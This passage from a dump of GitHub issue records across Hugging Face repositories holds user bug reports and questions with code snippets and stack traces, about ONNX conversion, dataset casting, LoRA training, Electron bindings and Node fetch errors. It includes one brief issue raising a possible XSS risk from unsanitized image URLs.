Or do we have to wait for someone to make a conversion script?\r\n\r\nOr could someone upload an ONNX-converted LCM model to Hugging Face and share it with us, please?\r\n\r\nKind regards\r\n\r\n\r\n\r\n### Who can help?\r\n\r\n@echarlaix \r\n\r\n", "url": "https://github.com/huggingface/optimum/issues/1497", "state": "closed", "labels": [ "bug" ], "created_at": "2023-10-31T08:57:16Z", "updated_at": "2024-01-04T14:21:54Z", "comments": 6, "user": "Amin456789" }, { "repo": "huggingface/dataset-viewer", "number": 2038, "title": "How to pass single quote in /filter endpoint \"where\" parameter?", "body": "See `https://huggingface.co/datasets/albertvillanova/lm_en_dummy2/viewer/default/train?f[meta][value]='{'file': 'file_4.txt'}'`\r\n\r\nFrom `https://datasets-server.huggingface.co/filter?dataset=albertvillanova/lm_en_dummy2&config=default&split=train&where=meta='{'file': 'file_4.txt'}'`, we get:\r\n\r\n```\r\n{\"error\":\"Parameter 'where' is invalid\"}\r\n```\r\n\r\nWe want to search for the value `{'file': 'file_4.txt'}` in the column `meta`\r\n", "url": "https://github.com/huggingface/dataset-viewer/issues/2038", "state": "closed", "labels": [ "bug", "documentation", "P1" ], "created_at": "2023-10-30T22:21:24Z", "updated_at": "2023-11-02T17:22:54Z", "user": "severo" }, { "repo": "huggingface/datasets", "number": 6364, "title": "ArrowNotImplementedError: Unsupported cast from string to list using function cast_list", "body": "Hi,\r\n\r\nI am trying to load a local CSV dataset (similar to explodinggradients_fiqa) using load_dataset. When I try to pass features, I am facing the mentioned issue.\r\n\r\nCSV data sample (golden_dataset.csv):\r\nQuestion | Context | answer | groundtruth\r\n\"what is abc?\" | \"abc is this and that\" | \"abc is this \" | \"abc is this and that\"\r\n\r\n```\r\nimport csv \r\n\r\n# built it based on https://huggingface.co/datasets/explodinggradients/fiqa/viewer/ragas_eval?row=0\r\nmydict = [\r\n{'question' : \"what is abc?\", 'contexts': [\"abc is this and that\"], 'answer': \"abc is this \" , 'groundtruth': [\"abc is this and that\"]},\r\n{'question' : \"what is abc?\", 'contexts': [\"abc is this and that\"], 'answer': \"abc is this \" , 'groundtruth': [\"abc is this and that\"]},\r\n{'question' : \"what is abc?\", 'contexts': [\"abc is this and that\"], 'answer': \"abc is this \" , 'groundtruth': [\"abc is this and that\"]}\r\n]\r\n \r\nfields = ['question', 'contexts', 'answer', 'ground_truths'] \r\n\r\nwith open('golden_dataset.csv', 'w', newline='\\n') as file: \r\n    writer = csv.DictWriter(file, fieldnames=fields)\r\n\r\n    writer.writeheader() \r\n    for row in mydict:\r\n        writer.writerow(row)\r\n```\r\n\r\nRetrieved dataset:\r\nDatasetDict({\r\n    train: Dataset({\r\n        features: ['question', 'contexts', 'answer', 'ground_truths'],\r\n        num_rows: 1\r\n    })\r\n})\r\n\r\n\r\nCode to reproduce issue:\r\n\r\n\r\n```\r\nfrom datasets import load_dataset, Features, Sequence, Value\r\n\r\nencode_features = Features(\r\n    {\r\n        \"question\": Value(dtype='string', id=0),\r\n        \"contexts\": Sequence(feature=Value(dtype='string', id=1)),\r\n        \"answer\": Value(dtype='string', id=2),\r\n        \"ground_truths\": Sequence(feature=Value(dtype='string', id=3)),\r\n    }\r\n)\r\n\r\neval_dataset = load_dataset('csv', data_files='/golden_dataset.csv', features=encode_features)\r\n```\r\n\r\n\r\nError trace:\r\n\r\n```\r\n---------------------------------------------------------------------------\r\nArrowNotImplementedError Traceback (most recent call last)\r\nFile 
~/anaconda3/envs/python3/lib/python3.10/site-packages/datasets/builder.py:1925, in ArrowBasedBuilder._prepare_split_single(self, gen_kwargs, fpath, file_format, max_shard_size, job_id)\r\n 1924 _time = time.time()\r\n-> 1925 for _, table in generator:\r\n 1926 if max_shard_size is not None and writer._num_bytes > max_shard_size:\r\n\r\nFile ~/anaconda3/envs/python3/lib/python3.10/site-packages/datasets/packaged_modules/csv/csv.py:192, in Csv._generate_tables(self, files)\r\n 189 # Uncomment for debugging (will print the Arrow table size and elements)\r\n 190 # logger.warning(f\"pa_table: {pa_table} num rows: {pa_table.num_rows}\")\r\n 191 # logger.warning('\\n'.join(str(pa_table.slice(i, 1).to_pydict()) for i in range(pa_table.num_rows)))\r\n--> 192 yield (file_idx, batch_idx), self._cast_table(pa_table)\r\n 193 except ValueError as e:\r\n\r\nFile ~/anaconda3/envs/python3/lib/python3.10/site-packages/datasets/packaged_modules/csv/csv.py:167, in Csv._cast_table(self, pa_table)\r\n 165 if all(not require_storage_cast(feature) for feature in self.config.features.values()):\r\n 166 # cheaper cast\r\n--> 167 pa_table = pa.Table.from_arrays([pa_table[field.name] for field in schema], schema=schema)\r\n 168 else:\r\n 169 # more expensive cast; allows str <-> int/float or str to Audio for example\r\n\r\nFile ~/anaconda3/envs/python3/lib/python3.10/site-packages/pyarrow/table.pxi:3781, in pyarrow.lib.Table.from_arrays()\r\n\r\nFile ~/anaconda3/envs/python3/lib/python3.10/site-packages/pyarrow/table.pxi:1449, in pyarrow.lib._sanitize_arrays()\r\n\r\nFile ~/anaconda3/envs/python3/lib/python3.10/site-packages/pyarrow/array.pxi:354, in pyarrow.lib.asarray()\r\n\r\nFile ~/anaconda3/envs/python3/lib/python3.10/site-packages/pyarrow/table.pxi:551, in pyarrow.lib.ChunkedArray.cast()\r\n\r\nFile ~/anaconda3/envs/python3/lib/python3.10/site-packages/pyarrow/compute.py:400, in cast(arr, target_type, safe, options, memory_pool)\r\n 399 options = CastOptions.safe(target_type)\r\n--> 400 return call_function(\"cast\", [arr], options, memory_pool)\r\n\r\nFile ~/anaconda3/envs/python3/lib/python3.10/site-packages/pyarrow/_compute.pyx:572, in pyarrow._compute.call_function()\r\n\r\nFile ~/anaconda3/envs/python3/lib/python3.10/site-packages/pyarrow/_compute.pyx:367, in pyarrow._compute.Function.call()\r\n\r\nFile ~/anaconda3/envs/python3/lib/python3.10/site-packages/pyarrow/error.pxi:144, in pyarrow.lib.pyarrow_internal_check_status()\r\n\r\nFile ~/anaconda3/envs/python3/lib/python3.10/site-packages/pyarrow/error.pxi:121, in pyarrow.lib.check_status()\r\n\r\nArrowNotImplementedError: Unsupported cast from string to list using function cast_list\r\n\r\nThe above exception was the direct cause of the following exception:\r\n\r\nDatasetGenerationError Traceback (most recent call last)\r\nCell In[57], line 1\r\n----> 1 eval_dataset = load_dataset('csv', data_files='/golden_dataset.csv", "url": "https://github.com/huggingface/datasets/issues/6364", "state": "closed", "labels": [], "created_at": "2023-10-30T20:14:01Z", "updated_at": "2023-10-31T19:21:23Z", "comments": 2, "user": "divyakrishna-devisetty" }, { "repo": "huggingface/diffusers", "number": 5575, "title": "How to set the \"transformer_in\" layer's hidden size in LoRA training?", "body": "### Describe the bug\r\n\r\nI modify the code for text-to-image [lora](https://github.com/huggingface/diffusers/blob/main/examples/text_to_image/train_text_to_image_lora.py) as Figure 1,\r\n\"image\"\r\nHowever, in 3D UNet there is a \"transformer_in\" layer that does not exist 
in the 2D UNet. So I added a \"transformer_in\" branch in the code, and I set the \"hidden_size\" to be \"unet.config.block_out_channels[0]\", following the 3D UNet's definition at [this link](https://github.com/huggingface/diffusers/blob/main/src/diffusers/models/unet_3d_condition.py), as shown in Figure 2:\r\n\"image\"\r\nBut then there is a shape error, as shown in Figure 3:\r\n![image](https://github.com/huggingface/diffusers/assets/52530394/7a279e34-2af8-4409-8e93-606f61fd506f)\r\n\r\n\r\n### Reproduction\r\n\r\nLoad a 3D UNet. Adapt the LoRA code as in Figure 1.\r\n\r\n### Logs\r\n\r\n_No response_\r\n\r\n### System Info\r\n\r\n- `diffusers` version: 0.21.4\r\n- Platform: Linux-5.11.0-34-generic-x86_64-with-glibc2.31\r\n- Python version: 3.10.13\r\n- PyTorch version (GPU?): 2.0.1 (True)\r\n- Huggingface_hub version: 0.18.0\r\n- Transformers version: 4.26.0\r\n- Accelerate version: 0.23.0\r\n- xFormers version: 0.0.22.post7\r\n- Using GPU in script?: \r\n- Using distributed or parallel set-up in script?: \r\n\r\n\r\n### Who can help?\r\n\r\n@sayakpaul @patrickvonplaten @DN6 @yiyi", "url": "https://github.com/huggingface/diffusers/issues/5575", "state": "closed", "labels": [ "bug", "stale" ], "created_at": "2023-10-30T03:44:32Z", "updated_at": "2024-01-10T15:07:20Z", "user": "lxycopper" }, { "repo": "huggingface/diffusers", "number": 5574, "title": "How to train a part of UNet attention parameters with LoRA", "body": "### Describe the bug\n\nI adapted the LoRA training code in # to train my model. \r\n\r\nSince I only want to update the parameters in the \"down block\", I commented out the code for the other attention blocks:\r\n\"image\"\r\nHowever, I got an error at this line \"unet.set_attn_processor(lora_attn_procs)\", as shown in the code:\r\n\"image\"\r\n\n\n### Reproduction\n\nComment out the code for the other attention blocks, as in my first figure.\n\n### Logs\n\n_No response_\n\n### System Info\n\ndiffusers 0.21.4\r\npython 3.10.13\r\nUbuntu 18\r\n\n\n### Who can help?\n\n@sayakpaul @patr", "url": "https://github.com/huggingface/diffusers/issues/5574", "state": "closed", "labels": [ "bug", "stale" ], "created_at": "2023-10-30T02:58:07Z", "updated_at": "2023-12-08T15:05:16Z", "user": "lxycopper" }, { "repo": "huggingface/transformers.js", "number": 372, "title": "[Question] onnxruntime_binding.node issue on mac electron app", "body": "Hi,\r\nI'm getting this error on an Intel MacBook running an Electron Forge app:\r\n```\r\n(node:63267) UnhandledPromiseRejectionWarning: Error: Cannot find module '../bin/napi-v3/darwin/x64/onnxruntime_binding.node'\r\nRequire stack:\r\n- /Users/sam/Desktop/electron-forge-react-typescript-tailwind/.webpack/main/index.js\r\n- /Users/sam/Desktop/electron-forge-react-typescript-tailwind/node_modules/electron/dist/Electron.app/Contents/Resources/default_app.asar/main.js\r\n- \r\n at Module._resolveFilename (node:internal/modules/cjs/loader:963:15)\r\n at n._resolveFilename (node:electron/js2c/browser_init:2:109411)\r\n at Module._load (node:internal/modules/cjs/loader:811:27)\r\n at f._load (node:electron/js2c/asar_bundle:2:13330)\r\n at Module.require (node:internal/modules/cjs/loader:1035:19)\r\n at require (node:internal/modules/cjs/helpers:102:18)\r\n at ./node_modules/@xenova/transformers/node_modules/onnxruntime-node/dist/binding.js (/Users/sam/Desktop/electron-forge-react-typescript-tailwind/.webpack/main/index.js:229:1)\r\n at __webpack_require__ (/Users/sam/Desktop/electron-forge-react-typescript-tailwind/.webpack/main/index.js:83093:42)\r\n at 
./node_modules/@xenova/transformers/node_modules/onnxruntime-node/dist/backend.js (/Users/sam/Desktop/electron-forge-react-typescript-tailwind/.webpack/main/index.js:153:19)\r\n```\r\nI checked the path ```../bin/napi-v3/darwin/x64/onnxruntime_binding.node``` and it does exist in node_modules, so I'm not sure what's going on or whether this is a bug. ", "url": "https://github.com/huggingface/transformers.js/issues/372", "state": "closed", "labels": [ "question" ], "created_at": "2023-10-28T00:34:05Z", "updated_at": "2023-11-01T21:56:19Z", "user": "samlhuillier" }, { "repo": "huggingface/transformers", "number": 27107, "title": "How to export a Marian model in rust ?", "body": "Most models based on Marian are also available in Rust, such as Helsinki-NLP/opus-mt-en-roa.\r\n\r\nIs it possible to do this using transformers?\r\nDid you assist Helsinki-NLP in exporting the models to Rust?", "url": "https://github.com/huggingface/transformers/issues/27107", "state": "closed", "labels": [], "created_at": "2023-10-27T13:01:13Z", "updated_at": "2023-12-05T08:03:53Z", "user": "flutter-painter" }, { "repo": "huggingface/chat-ui", "number": 535, "title": "API format?", "body": "OK, so this may be a dumb question, but I am not sure where else to ask it. If we use this repo to deploy our app on HF, what is the format of the API parameters for calling our Space?", "url": "https://github.com/huggingface/chat-ui/issues/535", "state": "closed", "labels": [], "created_at": "2023-10-26T21:56:22Z", "updated_at": "2023-10-27T15:01:57Z", "comments": 3, "user": "silvacarl2" }, { "repo": "huggingface/diffusers", "number": 5538, "title": "Why is the pipeline_stable_diffusion_upscale.py file not using the encoder-decoder latent?", "body": "### Describe the bug\n\nThere is no training script for pipeline_stable_diffusion_upscale.py because the authors chose not to utilize the latent domain for the super-resolution task. Additionally, the U-Net implemented in pipeline_stable_diffusion_upscale.py only accepts 7 channels. How is this achieved?\n\n### Reproduction\n\nNone\n\n### Logs\n\n_No response_\n\n### System Info\n\nNone\n\n### Who can help?\n\n[AnasHXH](https://github.com/AnasHXH)", "url": "https://github.com/huggingface/diffusers/issues/5538", "state": "closed", "labels": [ "question", "stale" ], "created_at": "2023-10-26T10:47:10Z", "updated_at": "2023-12-08T15:05:44Z", "user": "AnasHXH" }, { "repo": "huggingface/chat-ui", "number": 534, "title": "Login issue with Google OpenID", "body": "I set up Google OpenID for my chat-ui. I have set the scope to openId and ./auth/userinfo.profile in the OAuth Consent Screen. I tried to log the data shared by Google with the app, and it was the following \r\n\r\n{\r\n sub: '****',\r\n picture: 'https://lh3.googleusercontent.com/****',\r\n email: 'shagun@****',\r\n email_verified: true,\r\n hd: '*****'\r\n} \r\n\r\nAs you can see, the name is not being shared, and hence I am getting an error that Name is a required field. How can I fix this? \r\n\r\nNote: Google shares the name for some accounts and not for others. 
This is my first time working with OpenID, so any help will be appreciated.", "url": "https://github.com/huggingface/chat-ui/issues/534", "state": "closed", "labels": [], "created_at": "2023-10-26T10:00:05Z", "updated_at": "2023-10-26T10:49:36Z", "comments": 3, "user": "shagunhexo" }, { "repo": "huggingface/candle", "number": 1185, "title": "Question: How to create a Var from MmapedSafetensors", "body": "Hello everybody,\r\n\r\nI was wondering how to create a Var instance from an `MMapedSafetensors` `TensorView`. I have tried using `candle_core::Var::from_slice(tensor.data(), tensor.shape(), &device)?`, but I get the error:\r\n\r\n`Error: Shape mismatch, got buffer of size 90177536 which is compatible with shape [11008, 4096]`.\r\n\r\nIs there a better way to do this? \r\n\r\nIn addition, I notice the buffer is of type `u8`, which is definitely not the data type the safetensors should be decoded as. Where can I find how `VarBuilder` does this?\r\n\r\n**In summary, I have 2 questions:**\r\n- How to decode a `TensorView` into a `Var`?\r\n- Or, if the above is not feasible, how does `VarBuilder` do this?", "url": "https://github.com/huggingface/candle/issues/1185", "state": "closed", "labels": [], "created_at": "2023-10-26T09:41:37Z", "updated_at": "2023-10-26T11:26:29Z", "user": "EricLBuehler" }, { "repo": "huggingface/datasets", "number": 6353, "title": "load_dataset save_to_disk load_from_disk error", "body": "### Describe the bug\r\n\r\ndatasets version: 2.10.1\r\nI ran `load_dataset` and `save_to_disk` successfully on Windows 10 (**and I ran `load_from_disk(/LLM/data/wiki)` successfully on Windows 10**), and I copied the dataset `/LLM/data/wiki`\r\ninto an Ubuntu system, but when I run `load_from_disk(/LLM/data/wiki)` on Ubuntu, something weird happens:\r\n\r\n\r\n```\r\nload_from_disk('/LLM/data/wiki')\r\n File \"/usr/local/miniconda3/lib/python3.8/site-packages/datasets/load.py\", line 1874, in load_from_disk\r\n return DatasetDict.load_from_disk(dataset_path, keep_in_memory=keep_in_memory, storage_options=storage_options)\r\n File \"/usr/local/miniconda3/lib/python3.8/site-packages/datasets/dataset_dict.py\", line 1309, in load_from_disk\r\n dataset_dict[k] = Dataset.load_from_disk(\r\n File \"/usr/local/miniconda3/lib/python3.8/site-packages/datasets/arrow_dataset.py\", line 1543, in load_from_disk\r\n fs_token_paths = fsspec.get_fs_token_paths(dataset_path, storage_options=storage_options)\r\n File \"/usr/local/miniconda3/lib/python3.8/site-packages/fsspec/core.py\", line 610, in get_fs_token_paths\r\n chain = _un_chain(urlpath0, storage_options or {})\r\n File \"/usr/local/miniconda3/lib/python3.8/site-packages/fsspec/core.py\", line 325, in _un_chain\r\n cls = get_filesystem_class(protocol)\r\n File \"/usr/local/miniconda3/lib/python3.8/site-packages/fsspec/registry.py\", line 232, in get_filesystem_class\r\n raise ValueError(f\"Protocol not known: {protocol}\")\r\nValueError: Protocol not known: /LLM/data/wiki\r\n```\r\nIt seems that something went wrong with the arrow file?\r\nHow can I solve this, since currently I cannot save_to_disk on the Ubuntu system?\r\n\r\n### Steps to reproduce the bug\r\n\r\ndatasets version: 2.10.1\r\n\r\n### Expected behavior\r\n\r\ndatasets version: 2.10.1\r\n\r\n### Environment info\r\n\r\ndatasets version: 2.10.1", "url": "https://github.com/huggingface/datasets/issues/6353", "state": "closed", "labels": [], "created_at": "2023-10-26T03:47:06Z", "updated_at": "2024-04-03T05:31:01Z", "comments": 5, "user": "brisker" }, { "repo": 
"huggingface/text-embeddings-inference", "number": 43, "title": "How to add custom python file for pretrained model on TEI server?", "body": "### System Info\r\n\r\nI am pretty new to this space. Please help.\r\nI have made a python file with pre-trained model, which generates embeddings. What I want is to -\r\n1. Create a docker image of Python file\r\n2. Run it on TEI server?\r\n\r\n\r\nHow can we do this?\r\n\r\n\r\n\r\n\r\n\r\n\r\n### Information\r\n\r\n- [ ] Docker\r\n- [ ] The CLI directly\r\n\r\n### Tasks\r\n\r\n- [ ] An officially supported command\r\n- [X] My own modifications\r\n\r\n### Reproduction\r\n\r\nNeed to host a custom python file( which runs a sentence embedding model) on TEI server\r\n\r\n### Expected behavior\r\n\r\nNA", "url": "https://github.com/huggingface/text-embeddings-inference/issues/43", "state": "open", "labels": [], "created_at": "2023-10-25T16:09:52Z", "updated_at": "2023-10-25T17:57:46Z", "user": "cken21" }, { "repo": "huggingface/llm-vscode", "number": 100, "title": "How to generate the response from locally hosted end point in vscode?", "body": "Hi,\r\n\r\nI managed to plug the llm-vcode extension to point to the locally running endpoint. Now when I am selected the content like as below:\r\n# function to sum 2 numbers in python \r\nthen Cmd+shif+a > llm: show code attribution \r\nMy local endpoint invokes and give the relevant response as well in below format \r\n\r\n`{\r\n \"details\": {\r\n \"best_of_sequences\": [\r\n {\r\n \"finish_reason\": \"length\",\r\n \"generated_text\": \"test\",\r\n \"generated_tokens\": 1,\r\n \"prefill\": [\r\n {\r\n \"id\": 0,\r\n \"logprob\": -0.34,\r\n \"text\": \"test\"\r\n }\r\n ],\r\n \"seed\": 42,\r\n \"tokens\": [\r\n {\r\n \"id\": 0,\r\n \"logprob\": -0.34,\r\n \"special\": false,\r\n \"text\": \"test\"\r\n }\r\n ],\r\n \"top_tokens\": [\r\n [\r\n {\r\n \"id\": 0,\r\n \"logprob\": -0.34,\r\n \"special\": false,\r\n \"text\": \"test\"\r\n }\r\n ]\r\n ]\r\n }\r\n ],\r\n \"finish_reason\": \"length\",\r\n \"generated_tokens\": 1,\r\n \"prefill\": [\r\n {\r\n \"id\": 0,\r\n \"logprob\": -0.34,\r\n \"text\": \"test\"\r\n }\r\n ],\r\n \"seed\": 42,\r\n \"tokens\": [\r\n {\r\n \"id\": 0,\r\n \"logprob\": -0.34,\r\n \"special\": false,\r\n \"text\": \"test\"\r\n }\r\n ],\r\n \"top_tokens\": [\r\n [\r\n {\r\n \"id\": 0,\r\n \"logprob\": -0.34,\r\n \"special\": false,\r\n \"text\": \"test\"\r\n }\r\n ]\r\n ]\r\n },\r\n \"generated_text\": \"test\"\r\n}`\r\n\"generated_text\": value is replaced with actual response with python sum function\r\n\r\nAfter 200, I can see the anything related to generated code in vscode. \r\n\r\nPlease suggest to how to I can get generated response in vscode itself.", "url": "https://github.com/huggingface/llm-vscode/issues/100", "state": "open", "labels": [ "stale" ], "created_at": "2023-10-25T15:55:40Z", "updated_at": "2023-11-25T01:46:01Z", "user": "dkaus1" }, { "repo": "huggingface/tokenizers", "number": 1375, "title": "Question: what is the add_special_tokens parameter of Tokenizer::encode?", "body": "As stated above, what does the parameter add_special_tokens do? Does it add bos/eos tokens? 
Thanks!", "url": "https://github.com/huggingface/tokenizers/issues/1375", "state": "closed", "labels": [], "created_at": "2023-10-25T09:55:55Z", "updated_at": "2023-10-25T18:43:54Z", "user": "EricLBuehler" }, { "repo": "huggingface/candle", "number": 1173, "title": "Question: what is the add_special_tokens parameter of Tokenizer::encode?", "body": "As stated above, what does the parameter add_special_tokens do? Does it add bos/eos tokens? Thanks!", "url": "https://github.com/huggingface/candle/issues/1173", "state": "closed", "labels": [], "created_at": "2023-10-25T09:30:01Z", "updated_at": "2023-10-25T09:55:42Z", "user": "EricLBuehler" }, { "repo": "huggingface/dataset-viewer", "number": 2009, "title": "Are URLs in rows response sanitized?", "body": "see https://github.com/huggingface/moon-landing/pull/7798#discussion_r1369813236 (internal)\r\n\r\n> Is \"src\" validated / sanitized?\r\n> if not there is a potential XSS exploit here (you can inject javascript code in an image src)\r\n\r\n> Are S3 object names sanitized? If no, it should be the case in dataset-server side", "url": "https://github.com/huggingface/dataset-viewer/issues/2009", "state": "closed", "labels": [ "question", "security", "P1" ], "created_at": "2023-10-24T15:10:29Z", "updated_at": "2023-11-21T15:39:13Z", "user": "severo" }, { "repo": "huggingface/chat-ui", "number": 528, "title": "Websearch error in proxy", "body": "I'm developing in a proxy environment, I'm guessing it's because **websearch module can't import the model(Xenova/gte-small) from huggingface.**\r\nI don't want to use websearch, but it tries to load the gte-small model anyway, and I get an error.\r\n\r\n```\r\n11:36:36 AM [vite] Error when evaluating SSR module /src/lib/server/websearch/sentenceSimilarity.ts:\r\n|- TypeError: fetch failed\r\n at fetch (/home/dev/chat-ui/node_modules/undici/index.js:110:15)\r\n at process.processTicksAndRejections (node:internal/process/task_queues:95:5)\r\n at async getModelFile (file:///home/dev/chat-ui/node_modules/@xenova/transformers/src/utils/hub.js:468:24)\r\n at async getModelJSON (file:///home/dev/chat-ui/node_modules/@xenova/transformers/src/utils/hub.js:542:18)\r\n at async Promise.all (index 1)\r\n at async loadTokenizer (file:///home/dev/chat-ui/node_modules/@xenova/transformers/src/tokenizers.js:56:16)\r\n at async AutoTokenizer.from_pretrained (file:///home/dev/chat-ui/node_modules/@xenova/transformers/src/tokenizers.js:3778:48)\r\n at async Promise.all (index 0)\r\n at async loadItems (file:///home/dev/chat-ui/node_modules/@xenova/transformers/src/pipelines.js:2110:5)\r\n at async Proxy.pipeline (file:///home/dev/chat-ui/node_modules/@xenova/transformers/src/pipelines.js:2056:19)\r\n\r\n11:36:36 AM [vite] Error when evaluating SSR module /src/lib/server/websearch/runWebSearch.ts: failed to import \"/src/lib/server/websearch/sentenceSimilarity.ts\"\r\n|- TypeError: fetch failed\r\n at fetch (/home/dev/chat-ui/node_modules/undici/index.js:110:15)\r\n at process.processTicksAndRejections (node:internal/process/task_queues:95:5)\r\n at async getModelFile (file:///home/dev/chat-ui/node_modules/@xenova/transformers/src/utils/hub.js:468:24)\r\n at async getModelJSON (file:///home/dev/chat-ui/node_modules/@xenova/transformers/src/utils/hub.js:542:18)\r\n at async Promise.all (index 1)\r\n at async loadTokenizer (file:///home/dev/chat-ui/node_modules/@xenova/transformers/src/tokenizers.js:56:16)\r\n at async AutoTokenizer.from_pretrained 
(file:///home/dev/chat-ui/node_modules/@xenova/transformers/src/tokenizers.js:3778:48)\r\n at async Promise.all (index 0)\r\n at async loadItems (file:///home/dev/chat-ui/node_modules/@xenova/transformers/src/pipelines.js:2110:5)\r\n at async Proxy.pipeline (file:///home/dev/chat-ui/node_modules/@xenova/transformers/src/pipelines.js:2056:19)\r\n\r\n11:36:36 AM [vite] Error when evaluating SSR module /home/dev/chat-ui/src/routes/conversation/[id]/+server.ts: failed to import \"/src/lib/server/websearch/runWebSearch.ts\"\r\n|- TypeError: fetch failed\r\n at fetch (/home/dev/chat-ui/node_modules/undici/index.js:110:15)\r\n at process.processTicksAndRejections (node:internal/process/task_queues:95:5)\r\n at async getModelFile (file:///home/dev/chat-ui/node_modules/@xenova/transformers/src/utils/hub.js:468:24)\r\n at async getModelJSON (file:///home/dev/chat-ui/node_modules/@xenova/transformers/src/utils/hub.js:542:18)\r\n at async Promise.all (index 1)\r\n at async loadTokenizer (file:///home/dev/chat-ui/node_modules/@xenova/transformers/src/tokenizers.js:56:16)\r\n at async AutoTokenizer.from_pretrained (file:///home/dev/chat-ui/node_modules/@xenova/transformers/src/tokenizers.js:3778:48)\r\n at async Promise.all (index 0)\r\n at async loadItems (file:///home/dev/chat-ui/node_modules/@xenova/transformers/src/pipelines.js:2110:5)\r\n at async Proxy.pipeline (file:///home/dev/chat-ui/node_modules/@xenova/transformers/src/pipelines.js:2056:19)\r\n\r\n```\r\n\r\n\r\n1. Is there a workaround to download the model directly?\r\n2. Needs improvement: the proxy-related code.\r\n3. Needs improvement: add an option to turn off websearch initialization. (", "url": "https://github.com/huggingface/chat-ui/issues/528", "state": "closed", "labels": [ "enhancement", "support", "websearch" ], "created_at": "2023-10-24T03:53:25Z", "updated_at": "2023-11-15T15:44:01Z", "comments": 6, "user": "calycekr" }, { "repo": "huggingface/candle", "number": 1165, "title": "How do I raise 2 to the power of a tensor?", "body": "How do I write:\r\n\r\n```python\r\nx = 2 ** (y * z)\r\n```\r\n\r\nwhere `y` is an integer and `z` is a tensor?\r\nI tried to use `powf`, but it only works with float arguments.", "url": "https://github.com/huggingface/candle/issues/1165", "state": "closed", "labels": [], "created_at": "2023-10-23T22:13:28Z", "updated_at": "2023-10-24T04:28:23Z", "user": "laptou" }, { "repo": "huggingface/candle", "number": 1163, "title": "how to modify the contents of a Tensor?", "body": "What is the `candle` equivalent of this?\r\n\r\n```python\r\nt[2, :] *= 2;\r\n```", "url": "https://github.com/huggingface/candle/issues/1163", "state": "closed", "labels": [], "created_at": "2023-10-23T19:58:50Z", "updated_at": "2023-10-24T04:28:10Z", "user": "laptou" }, { "repo": "huggingface/transformers.js", "number": 367, "title": "[Question] How to include ort-wasm-simd.wasm with the bundle?", "body": "How can I include ort-wasm-simd.wasm with the bundle? I'm using this in an app that needs to be able to run offline, so I'd like to package this with the lib. I'm also running this in a web worker, so that file gets requested 1+n times per user session when the worker starts.\r\n\"image\"\r\n", "url": "https://github.com/huggingface/transformers.js/issues/367", "state": "closed", "labels": [ "question" ], "created_at": "2023-10-23T04:54:16Z", "updated_at": "2023-10-26T08:27:28Z", "user": "mjp0" }, { "repo": "huggingface/autotrain-advanced", "number": 310, "title": "How to determine the LMTrainingType? 
chat or generic mode?", "body": "It is said that there are two modes (chat and generic), but I cannot find a way to determine it.", "url": "https://github.com/huggingface/autotrain-advanced/issues/310", "state": "closed", "labels": [], "created_at": "2023-10-21T14:28:59Z", "updated_at": "2023-11-26T04:31:08Z", "user": "qiaoqiaoLF" }, { "repo": "huggingface/datasets", "number": 6324, "title": "Conversion to Arrow fails due to wrong type heuristic", "body": "### Describe the bug\n\nI have a list of dictionaries with valid/JSON-serializable values. \r\n\r\nOne key is the denominator for a paragraph. In 99.9% of cases it's a number, but there are some occurrences of '1a', '2b' and so on.\r\n\r\nIf trying to convert this list to a dataset with `Dataset.from_list()`, I always get\r\n`ArrowInvalid: Could not convert '1' with type str: tried to convert to int64`, presumably because pyarrow tries to convert the keys to integers.\r\n\r\nIs there any way to circumvent this and fix the dtypes? I didn't find anything in the documentation.\n\n### Steps to reproduce the bug\n\n* create a list of dicts with one key being a string of an integer for the first few thousand occurrences and try to convert to a dataset.\r\n\n\n### Expected behavior\n\nThere shouldn't be an error (e.g. some flag to turn off automatic str to numeric conversion).\n\n### Environment info\n\n- `datasets` version: 2.14.5\r\n- Platform: Linux-5.15.0-84-generic-x86_64-with-glibc2.35\r\n- Python version: 3.9.18\r\n- Huggingface_hub version: 0.17.3\r\n- PyArrow version: 13.0.0\r\n- Pandas version: 2.1.1", "url": "https://github.com/huggingface/datasets/issues/6324", "state": "closed", "labels": [], "created_at": "2023-10-20T23:20:58Z", "updated_at": "2023-10-23T20:52:57Z", "comments": 2, "user": "jphme" }, { "repo": "huggingface/transformers.js", "number": 365, "title": "[Question] Headers not defined", "body": "Hi friends!\r\n\r\nNeither Headers nor fetch seems to be getting resolved... I am trying to run this in a Node.js application...\r\n\r\nfile:///home/rajesh/code/ai/js/invoice/node_modules/@xenova/transformers/src/utils/hub.js:201\r\n return fetch(urlOrPath, { headers });\r\n ^\r\n\r\nTypeError: fetch is not a function\r\n at getFile (file:///home/rajesh/code/ai/js/invoice/node_modules/@xenova/transformers/src/utils/hub.js:201:16)\r\n at getModelFile (file:///home/rajesh/code/ai/js/invoice/node_modules/@xenova/transformers/src/utils/hub.js:468:30)\r\n at async getModelJSON (file:///home/rajesh/code/ai/js/invoice/node_modules/@xenova/transformers/src/utils/hub.js:542:18)\r\n at async Promise.all (index 0)\r\n at async loadTokenizer (file:///home/rajesh/code/ai/js/invoice/node_modules/@xenova/transformers/src/tokenizers.js:52:16)\r\n at async Function.from_pretrained (file:///home/rajesh/code/ai/js/invoice/node_modules/@xenova/transformers/src/tokenizers.js:3826:48)\r\n at async Promise.all (index 0)\r\n at async loadItems (file:///home/rajesh/code/ai/js/invoice/node_modules/@xenova/transformers/src/pipelines.js:2193:5)\r\n at async pipeline (file:///home/rajesh/code/ai/js/invoice/node_modules/@xenova/transformers/src/pipelines.js:2139:19)\r\n at async Server. 
(/home/rajesh/code/ai/js/invoice/inv.js:65:24)\r\n\r\n-------\r\n\r\nUnable to load from local path \"/home/rajesh/code/ai/js/invoice/node_modules/@xenova/transformers/models/Xenova/distilbert-base-uncased-finetuned-sst-2-english/tokenizer.json\": \"ReferenceError: Headers is not defined\"\r\nUnable to load from local path \"/home/rajesh/code/ai/js/invoice/node_modules/@xenova/transformers/models/Xenova/distilbert-base-uncased-finetuned-sst-2-english/tokenizer_config.json\": \"ReferenceError: Headers is not defined\"\r\nUnable to load from local path \"/home/rajesh/code/ai/js/invoice/node_modules/@xenova/transformers/models/Xenova/distilbert-base-uncased-finetuned-sst-2-english/config.json\": \"ReferenceError: Headers is not defined\"\r\nfile:///home/rajesh/code/ai/js/invoice/node_modules/@xenova/transformers/src/utils/hub.js:188\r\n const headers = new Headers();\r\n ^\r\n\r\nReferenceError: Headers is not defined\r\n at getFile (file:///home/rajesh/code/ai/js/invoice/node_modules/@xenova/transformers/src/utils/hub.js:188:25)\r\n at getModelFile (file:///home/rajesh/code/ai/js/invoice/node_modules/@xenova/transformers/src/utils/hub.js:468:30)\r\n at async getModelJSON 